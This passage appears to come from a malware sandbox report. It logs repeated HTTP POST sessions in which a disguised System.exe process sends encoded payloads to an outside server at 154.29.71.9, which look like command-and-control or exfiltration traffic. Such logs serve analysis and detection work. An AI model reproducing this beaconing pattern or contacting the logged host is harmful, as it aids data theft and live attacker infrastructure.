41 | 192.168.2.4 | 49782 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:52:51.401971102 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:51.754359007 CET | 2596 | OUT | Data Raw: 59 59 5d 5f 5e 5c 58 5c 5b 59 5a 55 50 58 5b 5b 56 53 54 40 52 51 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YY]_^\X\[YZUPX[[VST@RQRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[.>9Z&;==$Z(-#S']0[/#-! 5^)P>4C20<]-/"Y ']/


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    42 | 192.168.2.4 | 49783 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:51.916843891 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:52.270006895 CET | 1856 | OUT | Data Raw: 59 58 58 5c 5e 59 58 5c 5b 59 5a 55 50 5f 5b 51 56 5c 54 45 52 5b 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX\^YX\[YZUP_[QV\TER[R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>1Q?=;+>7T3 Z83"P!.;689)X7$#?:?"Y ']/
                                                                                                    Jan 4, 2025 14:52:52.433855057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:52.572681904 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 11 32 39 0f 0f 25 03 23 0f 2e 02 39 50 2b 23 21 1d 38 3e 28 5a 2b 29 37 14 3b 23 3f 10 3e 3b 36 43 29 32 3c 0b 26 11 30 59 2b 36 20 51 03 12 27 11 26 5f 3a 59 2b 23 36 04 2e 3d 2b 1a 21 31 33 58 26 29 32 59 22 13 04 03 31 2f 35 1f 3e 11 25 51 2e 2e 3c 06 2e 0a 2c 54 2b 05 23 55 0b 1f 26 0e 24 1f 34 57 31 3b 34 10 29 30 28 5e 3c 04 05 57 20 14 27 01 25 00 32 10 27 1f 21 1f 30 32 2e 00 24 30 25 5a 22 10 2b 59 27 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"29%#.9P+#!8>(Z+)7;#?>;6C)2<&0Y+6 Q'&_:Y+#6.=+!13X&)2Y"1/5>%Q..<.,T+#U&$4W1;4)0(^<W '%2'!02.$0%Z"+Y':.S.-W=YL0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    43 | 192.168.2.4 | 49784 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:52.351747036 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:52.707581997 CET | 2596 | OUT | Data Raw: 59 58 58 5b 5b 5b 58 50 5b 59 5a 55 50 58 5b 51 56 55 54 44 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXX[[[XP[YZUPX[QVUTDR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,%[&(=>[#?=0 Z82W5.<"&(>713Y."Y ']/,
                                                                                                    Jan 4, 2025 14:52:52.869076014 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:53.002388000 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    44 | 192.168.2.4 | 49785 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:53.131720066 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:53.488770962 CET | 2600 | OUT | Data Raw: 59 50 5d 5f 5b 5d 58 5c 5b 59 5a 55 50 5d 5b 56 56 50 54 43 52 59 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP]_[]X\[YZUP][VVPTCRYR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_,=9Z%;1><;T';#, "!-;Q5")=<A2[-"Y ']/0
                                                                                                    Jan 4, 2025 14:52:53.757419109 CET | 225 | IN | HTTP/1.1 100 Continue
                                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 34 20 4a 61 6e 20 32 30 32 35 20 31 33 3a 35 32 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sat, 04 Jan 2025 13:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    45 | 192.168.2.4 | 49786 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:53.883260965 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:54.238763094 CET | 2600 | OUT | Data Raw: 59 5b 5d 5b 5b 5f 58 52 5b 59 5a 55 50 5a 5b 5b 56 50 54 47 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[][[_XR[YZUPZ[[VPTGRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.-&9>Z+$$;+/#:!0":*>#2$\:?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:54.536575079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:54.670201063 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:54 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    46 | 192.168.2.4 | 49787 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:55.063715935 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:55.410648108 CET | 2600 | OUT | Data Raw: 5c 5a 58 5c 5b 5d 58 54 5b 59 5a 55 50 51 5b 52 56 52 54 41 52 5e 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZX\[]XT[YZUPQ[RVRTAR^R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:8>$(*Q=-(3T3]/83!8!(6=8A27:"Y ']/
                                                                                                    Jan 4, 2025 14:52:55.589378119 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:55.724050045 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    47 | 192.168.2.4 | 49788 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:55.852781057 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:56.207518101 CET | 2600 | OUT | Data Raw: 5c 59 58 5b 5b 5e 5d 53 5b 59 5a 55 50 5a 5b 57 56 51 54 47 52 5d 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX[[^]S[YZUPZ[WVQTGR]R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/>%8)(=+'+<Y.#W![8!-P)>%U -?"Y ']/,
                                                                                                    Jan 4, 2025 14:52:56.388315916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:56.521966934 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    48 | 192.168.2.4 | 49789 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:56.648761034 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:57.004374027 CET | 2600 | OUT | Data Raw: 5c 5c 58 5e 5e 58 5d 53 5b 59 5a 55 50 5e 5b 55 56 5c 54 42 52 59 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\X^^X]S[YZUP^[UV\TBRYRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.->28*8X( '8;,"=<"(>=. @&Z."Y ']/<
                                                                                                    Jan 4, 2025 14:52:57.166953087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:57.294301033 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    49 | 192.168.2.4 | 49790 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:57.591888905 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1852
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    50 | 192.168.2.4 | 49791 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:57.796232939 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:58.145107985 CET | 2600 | OUT | Data Raw: 59 58 58 51 5b 5b 58 5c 5b 59 5a 55 50 50 5b 52 56 55 54 47 52 5d 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXQ[[X\[YZUPP[RVUTGR]RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X8>_%8*.?(0$$_,!'6)8D%3;:/"Y ']/
                                                                                                    Jan 4, 2025 14:52:58.322021008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:58.452106953 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    51 | 192.168.2.4 | 49792 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:58.585405111 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:58.943226099 CET2600OUTData Raw: 5c 59 58 5c 5e 5e 58 52 5b 59 5a 55 50 5b 5b 5a 56 5c 54 41 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX\^^XR[YZUP[[ZV\TAR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,)Y&!==?(=/0+/6=+W#;%V*X4@23\9"Y ']/(
                                                                                                    Jan 4, 2025 14:52:59.121826887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:59.258086920 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    52 | 192.168.2.4 | 49793 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:52:59.480422974 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2592
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:59.832882881 CET2592OUTData Raw: 59 59 58 5a 5b 54 5d 53 5b 59 5a 55 50 58 5b 53 56 5d 54 49 52 5e 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYXZ[T]S[YZUPX[SV]TIR^RQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/=&U>8Y<+T0;<_/ & =/!T(.1#(/?"Y ']/
                                                                                                    Jan 4, 2025 14:52:59.998016119 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:00.126226902 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:59 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    53 | 192.168.2.4 | 49795 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:00.589939117 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
